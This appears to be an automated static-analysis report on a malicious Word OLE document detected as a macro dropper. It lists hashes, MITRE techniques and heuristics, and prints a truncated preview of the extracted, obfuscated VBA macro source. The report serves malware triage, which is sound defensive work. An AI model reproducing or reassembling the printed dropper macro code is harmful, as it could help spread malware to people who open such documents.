Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ff4ddf4aa1f9b0e9…

MALICIOUS

Office (OLE)

227.5 KB Created: 2018-03-05 15:05:00 Authoring application: Microsoft Office Word First seen: 2019-02-10
MD5: 17ea41af6c2095763c515907d9891157 SHA-1: 2b03342c61480686b0c1ff1887eceba81d6e40ca SHA-256: ff4ddf4aa1f9b0e93830e1ff93a1a8ad3a5bccd9adc33730d1d5eda3a5b604b0
224 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1071.001 Web Protocols

The sample is a malicious OLE document containing a VBA macro. The macro uses obfuscation techniques and calls `CreateObject`, indicating an attempt to execute arbitrary code. The ClamAV detection 'Doc.Dropper.Agent-6464748-0' and the presence of a VBA macro with auto-execution markers strongly suggest this file acts as a dropper for a second-stage payload. The embedded URL, though benign, is noted as part of the document's structure.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-6464748-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6464748-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 71436 bytes
SHA-256: fbe96e6fda26a2c10d8c90748dde6c09e2c1481eab4c71bf39ed4b87051d32a8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 30 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "hkbaQLDn"
Function jiNIhShjPkG()
On Error Resume Next
mwjCbtwk = "RzSqwVKNzsXO=%mlPfufUwaOWomYfKokCjAqs"
SAULfRajnf = 8698450 / Atn(ilFivlB) / (9071374 - pIVQtlIoUoJ / 1522383 - Sqr(zLIQzfc * CStr(lOioUzSmfpizr / Sgn(7731342 - CDate(6301401 / XswEXT * 7800293 * Sqr(GPouZimWSqD))))) + (ncYoqCozfKXJi - 367897 / 8633859 / CLng(1237584)))
PjGUvDzXwjc = 6260530 / Atn(USawhFIXM) / (200044 - IfAkn / 3648960 - Sqr(UKOVipEwsfQXlf * CStr(uVkSpuTfSqnw / Sgn(4305224 - CDate(6032910 / YqizmWKzn * 7143320 * Sqr(lMdHoPXTkfzUd))))) + (Aivfr - 8577873 / 6536129 / CLng(3252000)))
jfmOh = niBSoLO + dd333h3sd(mwjCbtwk, 17, 11)
NQMPicDXr = "MllvfYTLETPnkEL=%QrioljYipnwTXzbWcpjD"
sFTonDD = 8032009 / Atn(QhVZfGBzzD) / (5938962 - IcVXbcwLUNoQKs / 2254872 - Sqr(PBpDozlPa * CStr(OaUlWzMSUO / Sgn(1496989 - CDate(446842 / VPiJCt * 960978 * Sqr(nvdiwNb))))) + (KqFwwO - 4208004 / 8171216 / CLng(6843680)))
zSvuQ = 8134071 / Atn(EsXzPNvUnKni) / (4373804 - OafqCYlkJ / 1910716 - Sqr(CFGGtoaME * CStr(XPzNU / Sgn(467533 - CDate(8755990 / wWHibknqzjRC * 3782941 * Sqr(NZNHpNuWNWS))))) + (qKhciWsw - 2092276 / 7517983 / CLng(3142789)))
coNmlsmHjX = GZootSjWz + dd333h3sd(NQMPicDXr, 12, 13)
naqMSaipG = "QWWzjGilJGmiUp% tes&&s=%4raoP"
ToTKAboodv = 8173427 / Atn(qEwQYc) / (4861172 - ljtWmNaBno / 3938010 - Sqr(DkVvX * CStr(LtrbflQb / Sgn(845423 - CDate(6388749 / iQiapG * 7803547 * Sqr(YrZXR))))) + (IJmEF - 6758462 / 34808 / CLng(8548203)))
sjlwsPnW = 1484672 / Atn(fmJAIFLJ) / (8760708 - JXmdNijqzamWZa / 4442285 - Sqr(dXwwFmIRuD * CStr(nwSjPdVrkXJqbC / Sgn(1776904 - CDate(8632985 / iJMidhcoKvp * 4512471 * Sqr(UiJjsuh))))) + (WsEimETjXvwtb - 7592621 / 7066682 / CLng(8373509)))
MrQuiBnf = dWTDotuB + dd333h3sd(naqMSaipG, 3, 15)
MTzvsvvfKv = "LEuFwjhtzdUZLVioMlwjOtNioakdat!!%8ravPjjRW"
PusRNiRu = 2986253 / Atn(MRzclYjjNjAKz) / (2794783 - qMzis / 1898168 - Sqr(bIUbthT * CStr(jaLoGTqfwLruEZ / Sgn(1849855 - CDate(580923 / iwKRjXW * 6972960 * Sqr(qrHKfBNOCZzKIh))))) + (hASBO - 1710896 / 472647 / CLng(9713505)))
cULUr = 3336551 / Atn(LiIhzCo) / (867765 - dwXojp / 6516327 - Sqr(WjDCZQKkjEVVq * CStr(sqvUTEjFXKFB / Sgn(857092 - CDate(302235 / MmMhSj * 2858458 * Sqr(MlSwwOz))))) + (jPpFhsMW - 5702331 / 1784564 / CLng(3107579)))
SSHhjv = KOprFif + dd333h3sd(MTzvsvvfKv, 6, 7)
plfFcR = "jtujWHwPzSm%!!%5rav%!!%4raLhpFqfLDlGShYpJqjADWKdv"
TDJhitolHNI = 3840665 / Atn(krPSqaIcYom) / (8218442 - dqAwpG / 5054572 - Sqr(LXsVwt * CStr(tZsvzFiz / Sgn(2268247 - CDate(7921091 / vmnpMIpSPp * 3739773 * Sqr(UqtXYUXzsh))))) + (jwwqrEzroHMKn - 3798838 / 4346216 / CLng(2205856)))
iNVhYYZi = 6858019 / Atn(jdbZzXFGhFi) / (7724171 - lOvEqPRwNQziU / 1530406 - Sqr(GEBInRLEQJA * CStr(llWtMAPbw / Sgn(8468504 - CDate(2867273 / vSjSMdvdPZz * 5662100 * Sqr(WAaZK))))) + (vpqfNrWliE - 6185507 / 6705594 / CLng(2743921)))
tnPzblOzFaG = twYMIaW + dd333h3sd(plfFcR, 24, 15)
LzJOVNPAb = "AmtXFcWziFaniiXLljDmWeh=%5rav% tes&&YwKHDj"
wqibwFZUfbt = 2475192 / Atn(OGdfkH) / (7215672 - corzLnUa / 2993092 - Sqr(DhbiJAZBCQTN * CStr(jkdvzQEhvOcu / Sgn(4740479 - CDate(5286591 / ZhmXNFWfjkwdGj * 990650 * Sqr(wODHNhrVK))))) + (FHSzjlY - 5089168 / 5405907 / CLng(4080540)))
zaImZjQo = 5733435 / Atn(AfMFzLDmzzqtdj) / (4025598 - lrpRNCAO / 2399308 - Sqr(ALEjHjrDNYu * CStr(jjSXNH / Sgn(3336933 - CDate(4913044 / DQFpkfMhw * 5941603 * Sqr(sPKsiRqGBZSwYd))))) + (Izppsz - 7486263 / 2228676 / CLng(9446769)))
GtMTE = VNVltrnOWJLl + dd333h3sd(LzJOVNPAb, 4, 18)
IiHmduJoSz = "JEzHPfqPqlVZRDJRobWtj=%2rav% tes&&p=%zpoqXtzhppPfEXO"
iOCjZTPB = 5089139 / Atn(vjEYiwsZdiOXcJ) / (3026206 - FwdkqwhSbGF / 8515854 - Sqr(YmvRmWXtQ * CStr(rApjjc / Sgn(3303393 - CDate(4871316 / zOSYbpF * 9697745 * Sqr(lzXrAAFrSFpnsm))))) + (rmkBQwqJhstJ - 1124595 / 2764127 / CLng(3775746)))
SEjzH = 5373908 / Atn(XZIThAzpbsJ) / (2159368 - ZHcdhp
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.